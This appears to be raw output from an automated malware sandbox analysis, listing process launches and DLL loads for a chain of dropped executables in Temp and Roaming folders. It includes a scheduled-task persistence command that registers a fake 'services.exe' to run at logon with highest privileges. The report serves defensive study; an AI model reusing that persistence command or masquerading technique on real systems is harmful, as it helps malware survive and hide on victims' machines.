Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1080595001\w3Xwk4R.exe "C:\Users\user\AppData\Local\Temp\1080595001\w3Xwk4R.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1081341001\0LGvvQO.exe "C:\Users\user\AppData\Local\Temp\1081341001\0LGvvQO.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1080446001\KQlljCB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Process created: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe "C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe"
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Process created: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe "C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe"
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Process created: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe "C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe"
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process created: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe "C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe"
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /create /tn "Windows Startup" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\services.exe" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process created: C:\Users\user\AppData\Roaming\SubDir\services.exe "C:\Users\user\AppData\Roaming\SubDir\services.exe"
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process created: C:\Users\user\AppData\Roaming\SubDir\services.exe "C:\Users\user\AppData\Roaming\SubDir\services.exe"
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process created: C:\Users\user\AppData\Roaming\SubDir\services.exe "C:\Users\user\AppData\Roaming\SubDir\services.exe"
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /create /tn "Windows Startup" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\services.exe" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\1080595001\w3Xwk4R.exe	Process created: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe "C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe" -burn.clean.room="C:\Users\user\AppData\Local\Temp\1080595001\w3Xwk4R.exe" -burn.filehandle.attached=528 -burn.filehandle.self=648
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	Process created: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe
Source: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\random.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1080446001\KQlljCB.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
